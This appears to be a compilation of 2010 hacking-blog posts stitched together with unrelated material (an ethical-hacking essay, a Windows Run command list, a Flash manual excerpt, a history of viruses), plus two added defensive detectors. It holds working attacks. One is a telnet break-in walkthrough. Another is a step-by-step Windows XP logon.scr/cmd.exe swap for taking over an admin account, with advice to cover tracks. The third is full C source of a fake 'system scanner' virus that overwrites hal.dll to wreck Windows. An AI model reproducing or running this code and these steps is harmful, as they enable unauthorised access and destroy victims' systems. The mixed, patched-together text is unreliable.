of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.

NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns all usernames that contain the word "test". In the same way we can finger users such as "admin" and "user", and get interesting results.
Most machines that run telnet and have more than a certain number of users (mostly multi-user machines) almost always host users with weak or no passwords - the idea is just to find them. From here it is fairly certain that you will find a local SCO exploit that will elevate you to root.
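As an added example (not from the paper or from VLAD), the following Python is a log-side detector for the pattern described above: a wordlist run against one account, several accounts tried from the same source, and a login that succeeds only after many failures. The telnetd log format, host names and addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed syslog-style line written by a telnet login daemon:
# "Jun 24 10:00:00 host1 telnetd[412]: login failed user=angela from=203.0.113.9"
_EVENT = re.compile(
    r"^\w{3} +\d{1,2} \d\d:\d\d:\d\d \S+ telnetd\[\d+\]: "
    r"login (?P<result>failed|ok) user=(?P<user>\S+) from=(?P<src>[\d.]+)$"
)

# Constructed log: one source walks a wordlist against "angela" (the same dozen
# tries per account as in the pwscan run above), touches two more accounts,
# then logs in as a test account; a second source is an ordinary login.
_ATTACK_SRC = "203.0.113.9"
SAMPLE_LOG = "\n".join(
    [f"Jun 24 10:00:{i:02d} host1 telnetd[412]: login failed user=angela from={_ATTACK_SRC}"
     for i in range(12)]
    + [f"Jun 24 10:00:12 host1 telnetd[413]: login failed user=test from={_ATTACK_SRC}",
       f"Jun 24 10:00:13 host1 telnetd[414]: login failed user=admin from={_ATTACK_SRC}",
       f"Jun 24 10:00:14 host1 telnetd[415]: login ok user=monotest from={_ATTACK_SRC}",
       "Jun 24 10:30:00 host1 telnetd[420]: login ok user=bob from=198.51.100.4"]
)


def summarise_logins(log_text):
    """Per source address: failure count, distinct accounts tried, and successes.

    Each success is recorded as (user, number of failures seen before it).
    """
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "ok": []})
    for line in log_text.splitlines():
        m = _EVENT.match(line.strip())
        if not m:
            continue
        s = stats[m["src"]]
        if m["result"] == "failed":
            s["failed"] += 1
            s["users"].add(m["user"])
        else:
            s["ok"].append((m["user"], s["failed"]))
    return dict(stats)


def telnet_alerts(log_text, max_failures=10, max_users=3, failures_before_ok=3):
    """Return (src, reason, detail) tuples for sources showing the pattern above."""
    alerts = []
    for src, s in summarise_logins(log_text).items():
        if s["failed"] >= max_failures:
            alerts.append((src, "password guessing", s["failed"]))
        if len(s["users"]) >= max_users:
            alerts.append((src, "account enumeration", len(s["users"])))
        for user, prior_failures in s["ok"]:
            if prior_failures >= failures_before_ok:
                alerts.append((src, "login succeeded after failures", user))
    return alerts


if __name__ == "__main__":
    for alert in telnet_alerts(SAMPLE_LOG):
        print(alert)
```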

XP HACK:ADMIN PASSWORD

If you are looking to restore a Windows XP admin password:

WINDOWS TIPS COLLECTION
How to hack windows XP admin password

If you log into a limited account on your target machine and open up a DOS prompt, then enter this set of commands exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


Now what you have just done is told the computer to back up the command program and the screen saver file, then edited the settings so that when the machine starts the screen saver you will get an unprotected DOS prompt without logging into XP.

Once this happens, enter this command (minus the quotes):

"net user password"


If the Administrator account is called Frank and you want the password blah, enter this:

"net user Frank blah"

and this changes the password on Frank's machine to blah and you're in.


Have fun

P.S.: don't forget to copy the contents of temphack back into the system32 dir to cover tracks.
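As an added example (not part of the original post), the following Python checks a System32 folder for the traces this walkthrough leaves behind: a logon.scr that is byte-for-byte identical to cmd.exe, a missing logon.scr, or a leftover temphack folder. The fixture folders it builds for a dry run are constructed stand-ins, not real Windows binaries.

```python
import hashlib
import os
import tempfile


def _sha256(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_logon_screensaver(system32_dir, backup_dir_name="temphack"):
    """Report evidence of the logon.scr swap described above.

    Possible findings:
      "logon.scr missing"              - deleted and never replaced
      "logon.scr is a copy of cmd.exe" - byte-identical to cmd.exe, i.e. the renamed shell
      "leftover backup folder: <name>" - the temporary folder the walkthrough creates
    """
    findings = []
    scr = os.path.join(system32_dir, "logon.scr")
    cmd = os.path.join(system32_dir, "cmd.exe")
    if not os.path.isfile(scr):
        findings.append("logon.scr missing")
    elif os.path.isfile(cmd) and _sha256(scr) == _sha256(cmd):
        findings.append("logon.scr is a copy of cmd.exe")
    if os.path.isdir(os.path.join(system32_dir, backup_dir_name)):
        findings.append(f"leftover backup folder: {backup_dir_name}")
    return findings


def run_on_fixtures():
    """Build three throwaway fake System32 folders (constructed) and check each."""
    cases = {
        # name: (logon.scr content or None when absent, create the backup folder?)
        "swapped": (b"MZ constructed cmd.exe stand-in", True),
        "clean": (b"MZ constructed logon.scr stand-in", False),
        "missing": (None, False),
    }
    results = {}
    for name, (scr_bytes, with_backup) in cases.items():
        with tempfile.TemporaryDirectory() as d:
            with open(os.path.join(d, "cmd.exe"), "wb") as f:
                f.write(b"MZ constructed cmd.exe stand-in")
            if scr_bytes is not None:
                with open(os.path.join(d, "logon.scr"), "wb") as f:
                    f.write(scr_bytes)
            if with_backup:
                os.mkdir(os.path.join(d, "temphack"))
            results[name] = check_logon_screensaver(d)
    return results


if __name__ == "__main__":
    # On a Windows machine, point the check at the live System32 folder.
    root = os.environ.get("SystemRoot")
    target = os.path.join(root, "System32") if root else None
    if target and os.path.isdir(target):
        print(check_logon_screensaver(target) or "no findings")
    else:
        print(run_on_fixtures())
```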

/* STOSTER(VIRUS) BY SIBI CHAKKARAVARTHY. */ /*copy rights S-TECHNOLOGIES */

#include"dos.h"
#include"stdlib.h"
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OS CORRUPTION",choice;

void interrupt(void);///header
void findroot(void);
void showstatus(void);
void viral(void);
void accept(void);

void main()
{
viral();
accept();
textcolor(WHITE);
viral();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
if((choice=getch())!=13)
exit(0);
}
void viral()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);

//cputs wit a destinater(anti virus) file..yet i ve removed in this......


}
void findroot()
// hal.dll----HARDWARE ABSTRACTION LAYER(dynamic linking library file)

{
t=fopen("C:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);

/* started to ruin u r system......*/

cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("D:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("E:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
t=fopen("F:\\windows\\shutdown.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\hal.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\hal.dll","wb+");
if(b!=NULL)
{
showstatus();
interrupt();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
return(1);
}
void interrupt()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
viral();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

Wednesday, June 23, 2010

Understanding the Need to Hack Your Own Systems



To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and
expanding knowledge of hackers combined with the growing number of system
vulnerabilities and other unknowns, the time will come when all computer
systems are hacked or compromised in some way. Protecting your systems
from the bad guys — and not just the generic vulnerabilities that everyone
knows about — is absolutely critical. When you know hacker tricks, you can
see how vulnerable your systems are.

Hacking preys on weak security practices and undisclosed vulnerabilities.
Firewalls, encryption, and virtual private networks (VPNs) can create a false
feeling of safety. These security systems often focus on high-level vulnerabilities,
such as viruses and traffic through a firewall, without affecting how hackers
work. Attacking your own systems to discover vulnerabilities is a step to
making them more secure. This is the only proven method of greatly hardening
your systems from attack. If you don’t identify weaknesses, it’s a matter of
time before the vulnerabilities are exploited.

As hackers expand their knowledge, so should you. You must think like them
to protect your systems from them. You, as the ethical hacker, must know
activities hackers carry out and how to stop their efforts. You should know
what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only
protection against everything is to unplug your computer systems and lock
them away so no one can touch them — not even you. That’s not the best
approach to information security. What’s important is to protect your systems
from known vulnerabilities and common hacker attacks.

It’s impossible to buttress all possible vulnerabilities on all your systems. You
can’t plan for all possible attacks — especially the ones that are currently
unknown. However, the more combinations you try — the more you test whole
systems instead of individual units — the better your chances of discovering
vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your
systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
in your office and no internal Web server running, you may not have as much
to worry about as an Internet hosting provider would have. However, don’t
forget about insider threats from malicious employees!
Your overall goals as an ethical hacker should be as follows:

Hack your systems in a nondestructive fashion.

Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.

Apply results to remove vulnerabilities and better secure your systems.

Windows Run Commands

Want to get around Windows faster? Remember these commands. They will save
you a lot of time, and there are many you may never have seen or known about:
Windows ships with a number of tools and Control Panel applets that are hard
to find through the menus. Below is a combined list of Run commands (Start >
Run, or Win+R). Entries marked "(if installed)" depend on third-party
software; everything else ships with Windows XP. Several of these are also the
first stops when triaging a suspect XP machine: eventvwr.msc, services.msc,
msconfig, secpol.msc, lusrmgr.msc and sigverif.

Accessibility Controls --------- access.cpl
Accessibility Wizard --------- accwiz
Add Hardware Wizard --------- hdwwiz.cpl
Add/Remove Programs --------- appwiz.cpl
Administrative Tools --------- control admintools
Adobe Acrobat (if installed) --------- acrobat
Adobe Designer (if installed) --------- acrodist
Adobe Distiller (if installed) --------- acrodist
Adobe ImageReady (if installed) --------- imageready
Adobe Photoshop (if installed) --------- photoshop
Automatic Updates --------- wuaucpl.cpl
Bluetooth Transfer Wizard --------- fsquirt
Calculator --------- calc
Certificate Manager --------- certmgr.msc
Character Map --------- charmap
Check Disk Utility --------- chkdsk
Clipboard Viewer --------- clipbrd
Command Prompt --------- cmd
Component Services --------- dcomcnfg
Computer Management --------- compmgmt.msc
Control Panel --------- control
Date and Time Properties --------- timedate.cpl
DDE Shares --------- ddeshare
Device Manager --------- devmgmt.msc
DirectX Control Panel (if installed) --------- directx.cpl
DirectX Troubleshooter --------- dxdiag
Disk Cleanup Utility --------- cleanmgr
Disk Defragmenter --------- dfrg.msc
Disk Management --------- diskmgmt.msc
Disk Partition Manager --------- diskpart
Display Properties --------- control desktop
Display Properties --------- desk.cpl
Display Properties (Appearance tab preselected) --------- control color
Dr. Watson System Troubleshooting Utility --------- drwtsn32
Driver Verifier Utility --------- verifier
Event Viewer --------- eventvwr.msc
Files and Settings Transfer Tool --------- migwiz
File Signature Verification Tool --------- sigverif
Findfast --------- findfast.cpl
Firefox (if installed) --------- firefox
Folder Options --------- control folders
Fonts --------- control fonts
Fonts Folder --------- fonts
FreeCell Card Game --------- freecell
Game Controllers --------- joy.cpl
Group Policy Editor (XP Professional) --------- gpedit.msc
Hearts Card Game --------- mshearts
Help and Support --------- helpctr
HyperTerminal --------- hypertrm
IExpress Wizard --------- iexpress
Indexing Service --------- ciadv.msc
Internet Connection Wizard --------- icwconn1
Internet Explorer --------- iexplore
Internet Properties --------- inetcpl.cpl
Internet Setup Wizard --------- inetwiz
IP Configuration (display connection configuration) --------- ipconfig /all
IP Configuration (display DNS cache contents) --------- ipconfig /displaydns
IP Configuration (delete DNS cache contents) --------- ipconfig /flushdns
IP Configuration (release all connections) --------- ipconfig /release
IP Configuration (renew all connections) --------- ipconfig /renew
IP Configuration (refresh DHCP and re-register DNS) --------- ipconfig /registerdns
IP Configuration (display DHCP class ID) --------- ipconfig /showclassid
IP Configuration (modify DHCP class ID) --------- ipconfig /setclassid
Java Control Panel (if installed) --------- jpicpl32.cpl
Java Web Start (if installed) --------- javaws
Keyboard Properties --------- control keyboard
Local Security Settings --------- secpol.msc
Local Users and Groups --------- lusrmgr.msc
Log off Windows --------- logoff
Malicious Software Removal Tool --------- mrt
Microsoft Access (if installed) --------- msaccess
Microsoft Chat --------- winchat
Microsoft Excel (if installed) --------- excel
Microsoft FrontPage (if installed) --------- frontpg
Microsoft Movie Maker --------- moviemk
Microsoft Paint --------- mspaint
Microsoft PowerPoint (if installed) --------- powerpnt
Microsoft Synchronization Tool --------- mobsync
Microsoft Word (if installed) --------- winword
Minesweeper Game --------- winmine
Mouse Properties --------- control mouse
Mouse Properties --------- main.cpl
Nero (if installed) --------- nero
NetMeeting --------- conf
Network Connections --------- control netconnections
Network Connections --------- ncpa.cpl
Network Setup Wizard --------- netsetup.cpl
Notepad --------- notepad
Nview Desktop Manager (if installed) --------- nvtuicpl.cpl
Object Packager --------- packager
ODBC Data Source Administrator --------- odbccp32.cpl
On-Screen Keyboard --------- osk
AC3 Filter (if installed) --------- ac3filter.cpl
Outlook Express --------- msimn
Paint --------- pbrush
Password Properties --------- password.cpl
Performance Monitor --------- perfmon.msc
Performance Monitor --------- perfmon
Phone and Modem Options --------- telephon.cpl
Phone Dialer --------- dialer
Pinball Game --------- pinball
Power Configuration --------- powercfg.cpl
Printers and Faxes --------- control printers
Printers Folder --------- printers
Private Character Editor --------- eudcedit
QuickTime (if installed) --------- QuickTime.cpl
QuickTime Player (if installed) --------- quicktimeplayer
RealPlayer (if installed) --------- realplay
Regional Settings --------- intl.cpl
Registry Editor --------- regedit
Registry Editor --------- regedt32
Remote Access Phonebook --------- rasphone
Remote Desktop --------- mstsc
Removable Storage --------- ntmsmgr.msc
Removable Storage Operator Requests --------- ntmsoprq.msc
Resultant Set of Policy (XP Professional) --------- rsop.msc
Scanners and Cameras --------- sticpl.cpl
Scheduled Tasks --------- control schedtasks
Security Center --------- wscui.cpl
Services --------- services.msc
Shared Folders --------- fsmgmt.msc
Shut down Windows --------- shutdown
Sounds and Audio --------- mmsys.cpl
Spider Solitaire Card Game --------- spider
SQL Client Configuration --------- cliconfg
System Configuration Editor --------- sysedit
System Configuration Utility --------- msconfig
System File Checker Utility (scan immediately) --------- sfc /scannow
System File Checker Utility (scan once at next boot) --------- sfc /scanonce
System File Checker Utility (scan on every boot) --------- sfc /scanboot
System File Checker Utility (return to default setting) --------- sfc /revert
System File Checker Utility (purge file cache) --------- sfc /purgecache
System File Checker Utility (set cache size to x) --------- sfc /cachesize=x
System Information --------- msinfo32
System Properties --------- sysdm.cpl
Task Manager --------- taskmgr
TCP Tester --------- tcptest
Telnet Client --------- telnet
Tweak UI (if installed) --------- tweakui
User Account Management --------- nusrmgr.cpl
Utility Manager --------- utilman
Windows Address Book --------- wab
Windows Address Book Import Utility --------- wabmig
Windows Backup Utility (if installed) --------- ntbackup
Windows Explorer --------- explorer
Windows Firewall --------- firewall.cpl
Windows Magnifier --------- magnify
Windows Management Infrastructure --------- wmimgmt.msc
Windows Media Player --------- wmplayer
Windows Messenger --------- msmsgs
Windows Picture Import Wizard (camera must be connected) --------- wiaacmgr
Windows System Security Tool --------- syskey
Windows Update --------- wupdmgr
Windows Version --------- winver
Windows XP Tour Wizard --------- tourstart

Monday, June 21, 2010

Introduction to Ethical Hacking

How Hackers Beget Ethical Hackers

We’ve all heard of hackers. Many of us have even suffered the consequences
of hacker actions. So who are these hackers? Why is it important to know
about them? The next few sections give you the lowdown on hackers.

Defining hacker

Hacker is a word that has two meanings:

Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer
systems operate. They love discovering new ways to work electronically.

More recently, hacker has taken on a new meaning: someone who maliciously
breaks into systems for personal gain. Technically, these criminals are
crackers (criminal hackers). Crackers break into (crack) systems with
malicious intent. They are out for personal gain: fame, profit, and even
revenge. They modify, delete, and steal critical information, often making
other people miserable.

The good-guy (white-hat) hackers don’t like being in the same category as the
bad-guy (black-hat) hackers. (These terms come from Western movies where
the good guys wore white cowboy hats and the bad guys wore black cowboy
hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are
altruistically helping others. Yeah, right. Many malicious hackers are electronic
thieves.

Hackers (or bad guys) try to compromise computers.


Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some
prefer prestigious, well-protected systems, but hacking into anyone’s system
increases their status in hacker circles.

Friday, June 18, 2010

WORKING WITH FLASH

Moving the view of the Stage
When the Stage is magnified, you may not be able to see all of it. The Hand tool lets you move
the Stage to change the view without having to change the magnification.
To move the Stage view:
1 In the toolbox, select the Hand tool. To temporarily switch between another tool and the
Hand tool, hold down the Spacebar and click the tool in the toolbox.
2 Drag the Stage.

Using the grid, guides, and rulers
Flash comes with rulers and guides that help you draw and lay out objects precisely. You can place
guides in a document and snap objects to those guides, or turn on the grid and snap objects to it.
Using the grid
When the grid is displayed in a document, it appears as a set of lines behind the artwork in all
scenes. You can snap objects to the grid, and you can modify the grid size and grid line color.
To display or hide the drawing grid:
Choose View > Grid > Show Grid.
To turn snapping to grid lines on or off:
Choose View > Grid > Snap to Grid.
To set grid preferences:
1 Choose View > Grid > Edit Grid.
2 For Color, click the triangle in the color box and select a grid line color from the palette.
The default grid line color is gray.
3 Select or deselect Show Grid to display or hide the grid.
4 Select or deselect Snap to Grid to turn snapping to grid lines on or off.
5 For grid spacing, enter values in the text boxes to the right of the horizontal and vertical arrows.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to save the current settings as the default, click Save Default.
Using guides
You can drag horizontal and vertical guides from the rulers onto the Stage when the rulers are
displayed. You can move guides, lock guides, hide guides, and remove guides. You can also snap
objects to guides, and change guide color and snap tolerance (how close objects must be to snap
to a guide). Draggable guides appear only in the Timeline in which they were created.
To create custom guides or irregular guides, you use guide layers. See “Using guide layers”.
To display or hide the drawing guides:
Choose View > Guides > Show Guides.
Note: If the grid is visible and Snap to Grid is turned on when you create guides, guides will snap to the grid.
To turn snapping to guides on or off:
Choose View > Guides > Snap to Guides.
Note: Snapping to guides takes precedence over snapping to the grid in places where guides fall between grid lines.
To move a guide:
Use the Arrow tool to drag the guide.
To remove a guide:
With guides unlocked, use the Arrow tool to drag the guide to the horizontal or vertical ruler. For
information on locking and unlocking guides, see the following procedure.
To set guide preferences:
1 Choose View > Guides > Edit Guides.
2 For Color, click the triangle in the color box and select a guide line color from the palette.
The default guide color is green.
3 Select or deselect Show Guides to display or hide guides.
4 Select or deselect Snap to Guides to turn snapping to guides on or off.
5 Select or deselect Lock Guides to lock or unlock guides.
6 For Snap Accuracy, select an option from the pop-up menu.
7 If you want to remove all guides, click Clear All.
Note: Clear All removes all guides from the current scene.
8 If you want to save the current settings as the default, click Save Default.
Using rulers
When rulers are displayed, they appear along the top and left sides of the document. You can
change the unit of measure used in the rulers from the default of pixels. When you move an
element on the Stage with the rulers displayed, lines indicating the element’s dimensions appear
on the rulers.
To display or hide rulers:
Choose View > Rulers.
To specify the rulers’ unit of measure for a document:
Choose Modify > Document, and then select an option from the pop-up menu at the upper right.
Creating a new document
Each time you open Flash, the application creates a new file with the FLA extension. You can
create additional new Flash documents as you work. To set the size, frame rate, background color,
and other properties of a new document, you use the Document Properties dialog box.
You can also open a template as a new document. You can choose from standard templates that
ship with Flash, or open a template you have saved previously. For information on saving a
document file as a template, see “Saving Flash documents”.
To create a new document and set its properties:
1 Choose File > New.
2 Choose Modify > Document.
The Document Properties dialog box appears.
3 For Frame Rate, enter the number of animation frames to be displayed every second. For
most computer-displayed animations, especially those playing from a Web site, 8 fps (frames
per second) to 12 fps is sufficient. (12 fps is the default frame rate.)
4 For Dimensions, do one of the following:
• To specify the Stage size in pixels, enter values in the Width and Height text boxes.
The default movie size is 550 x 400 pixels. The minimum size is 1 x 1 pixels; the maximum is
2880 x 2880 pixels.
• To set the Stage size so that there is equal space around the content on all sides, click the
Contents button to the right of Match. To minimize movie size, align all elements to the upper
left corner of the Stage, and then click Contents.
• To set the Stage size to the maximum available print area, click Printer. This area is determined
by the paper size minus the current margin selected in the Margins area of the Page Setup
dialog box (Windows) or the Print Margins dialog box (Macintosh).
• To set the Stage size to the default size, click Default.
5 To set the background color of your movie, click the triangle in the Background Color box and
select a color from the palette.
6 To specify the unit of measure for rulers that you can display along the top and side of the
application window, select an option from the pop-up menu in the upper right. See “Using
rulers” on page 21. (This setting also determines the units used in the Info panel.)
7 Do one of the following:
• To make the new settings the default properties for your new document only, click OK.
• To make these settings the default properties for all new documents, click Make Default.
To open a template as a new document:
1 Choose File > New from Template.
2 In the New Document dialog box, select a category from the Category list, and select a
document from the Category Items list.
3 Click OK.
Setting preferences in Flash
Flash lets you set preferences for general application operations, editing operations, and
Clipboard operations. See also “Choosing drawing settings”.
To set preferences:
1 Choose Edit > Preferences.
2 Click the General, Editing, Clipboard, Warning, or ActionScript Editor tab, and choose from the
respective options as described in the procedures that follow. For more information on
ActionScript Editor preferences, see “Setting Actions panel preferences” under Help > Using
Flash.
To set general preferences, choose from the following options:
• For Undo Levels, enter a value from 0 to 200 to set the number of undo/redo levels. Undo
levels require memory; the more undo levels you use, the more system memory is taken up.
The default is 100.
• For Printing Options (Windows only), select Disable PostScript to disable PostScript
output when printing to a PostScript printer. By default, this option is deselected. Select this
option if you have problems printing to a PostScript printer, but keep in mind that this will
slow down printing.
• For Selection Options, select or deselect Shift Select to control how Flash handles selection of
multiple elements. When Shift Select is off, clicking additional elements adds them to the
current selection. When Shift Select is on, clicking additional elements deselects other
elements unless you hold down the Shift key.
• Select Show Tooltips to display tooltips when the pointer pauses over a control. Deselect this
option if you don’t want to see the tooltips.
• For Timeline Options, select Disable Timeline Docking to keep the Timeline from attaching
itself to the application window once it has been separated into its own window. For more
information, see “Using the Timeline”
• Select Span Based Selection to use span-based selection in the Timeline, rather than the default
frame-based selection (Flash 5 used span-based selection). For more information on span-based
and frame-based selection, see “Working with frames in the Timeline”
• Select Named Anchor on Scenes to have Flash make the first frame of each scene in a movie a
named anchor. Named anchors let you use the Forward and Back buttons in a browser to jump
from scene to scene in a movie. For more information, see “Using named anchors”
• For Highlight Color, select Use This Color and select a color from the palette, or select Use
Layer Color to use the current layer’s outline color.
• For Font Mapping Default, select a font to use when substituting missing fonts in movies you
open in Flash. See “Substituting missing fonts”.
To set editing preferences, choose from the following options:
• For Pen Tool options, see “Setting Pen tool preferences”.
• For Vertical Text options, select Default Text Orientation to make the default orientation of
text vertical, which is useful for some Asian language fonts. By default, this option is
deselected.
• Select Right to Left Text Flow to reverse the default text display direction. This option is
deselected by default.
• Select No Kerning to turn off kerning for vertical text. This option is deselected by default, but
is useful to improve spacing for some fonts that use kerning tables.
• For Drawing Settings, see “Choosing drawing settings”

To set Clipboard preferences, choose from the following options:
• For Bitmaps (Windows only), select options for Color Depth and Resolution to specify these
parameters for bitmaps copied to the Clipboard. Select Smooth to apply anti-aliasing. Enter a
value in the Size Limit text box to specify the amount of RAM that is used when placing a
bitmap image on the Clipboard. Increase this value when working with large or
high-resolution bitmap images. If your computer has limited memory, choose None.
• For Gradients (Windows only), choose an option to specify the quality of gradient fills placed
in the Windows Metafile. Choosing a higher quality increases the time required to copy
artwork. Use this setting to specify gradient quality when pasting items to a location outside of
Flash. When you are pasting within Flash, the full gradient quality of the copied data is
preserved regardless of the Gradients on Clipboard setting.
• For PICT Settings (Macintosh only), for Type, select Objects to preserve data copied to the
Clipboard as vector artwork, or select one of the bitmap formats to convert the copied artwork
to a bitmap. Enter a value for Resolution. Select Include PostScript to include PostScript data.
For Gradients, choose an option to specify gradient quality in the PICT. Choosing a higher
quality increases the time required to copy artwork. Use the Gradients setting to specify
gradient quality when pasting items to a location outside of Flash. When you are pasting within
Flash, the full gradient quality of the copied data is preserved regardless of the Gradient setting.
• For FreeHand Text, select Maintain Text as Blocks to keep text editable in a pasted FreeHand file.
To set warning preferences, choose one of the following options:
• Select Warn on Save for Macromedia Flash 5 Compatibility to have Flash warn you when you
try to save documents with Flash MX–specific content to a Flash 5 file. This option is selected
by default.
• Select Warn on Missing Fonts to have Flash warn you when you open a Flash document that
uses fonts that are not installed on your computer. This option is selected by default.
• Select Warn on Loss of Expert Mode Formatting to have Flash warn you of any expert mode
formatting that will be lost when you switch to normal mode in the Actions panel. This option
is selected by default.
• Select Warn on Reading Generator Content to have Flash display a red “X” over any Generator
objects, as a reminder that Generator objects are not supported in Flash MX.
• Select Warn on Inserting Frames when Importing Content to have Flash alert you when it
inserts frames in your document to accommodate audio or video files that you import.

Thursday, June 17, 2010

Viral operations

Although the "original" definition of computer viral programs
refers to reproduction by attaching to other programs, viri that
act in this manner have been less successful than those that
use other means. In the personal computer world, boot sector
infectors have been much more effective. (Examples in the
MS-DOS community are the BRAIN and Stoned viral programs.
Examples in the Mac realm are not as clear, but the WDEF virus
could be said to be a type of boot sector infector, as the WDEF
resource is one that is run automatically as soon as any Mac
disk is inserted, although this has changed under System 7.)

In larger systems, mini and mainframe computers, network and
mail viral programs have, so far, had the greatest impact. The
Morris/Internet/UNIX worm managed to spread and reproduce using
the facility of networked machines to submit programs to each
other. (A VMS program, WANK, used many of the same techniques.)
The CHRISTMA EXEC used mainframe mail commands, and the ability
to submit programs by mail, in order to reproduce copies which
eventually flooded the network.

Network and mail viral programs carry, in a sense, their own
payload. The reproduction of the programs themselves uses the
resources of the hosts affected, and in the cases of both the
Morris and CHRISTMA worms went so far as to deny service to
users by using all available computing or communications
resources.

Most other viral programs seem to be written "for their own
sake". A kind of electronic graffiti which writes itself on
further walls. However, even these can do damage, as with the
Stoned virus, which overwrites sections of the FAT with the
original boot sector. Some appear to be written as pranks, and
others as a kind of advertising, although the potential for
damage from even "benign" viri cannot be considered funny, and
the "advertising" viri probably don't engender much goodwill.

Relatively few viral programs carry a deliberately damaging
payload. Those which do attempt to erase infected programs or
disks are, fortunately, self limiting.

The last payload, or function, which a viral program may carry,
is some kind of intelligence to enable it to evade detection.
So far the various kinds of evasive action (self-modification,
multiple encryption and "stealth" activity) have not proven to
have any advantageous "survival" characteristics. In one sense,
this is to be regretted, as it demonstrates that the majority of
computer users are not taking the most elementary precautions to
defend against viral programs.

Viral activation

In attempting to protect against viral infection, and
particularly when trying to disinfect systems, it is important to
bear in mind the times that the virus is actively "infectious".
The viral activation is not the same as the activation of the
payload that a virus may carry. For example, the payload of the
original "Stoned" virus was a message which appeared on the
screen saying "Your PC is now Stoned!". This message only
appears at boot time, and on only one eighth of the times the
computer is rebooted. The virus, however, is infectious at all
times, if it has infected the hard disk.

There are basically three possibilities for the infectious
period: now ("one-shot"), during program run ("while called") or
from now on (resident). These periods may be modified by other
circumstances. A resident virus may remain in memory, but only
be actively infecting when a disk is accessed. A "while called"
virus may only infect a new program when a directory is changed.

"One-shot" viri only get one chance on each "run" of the infected
program. The viral code will seek out and infect a target
program. They then pass control to the original program, and
perform no further functions. These are, of course, the simplest
of the viral programs. Mainframe "mail" viri are generally of
this type.

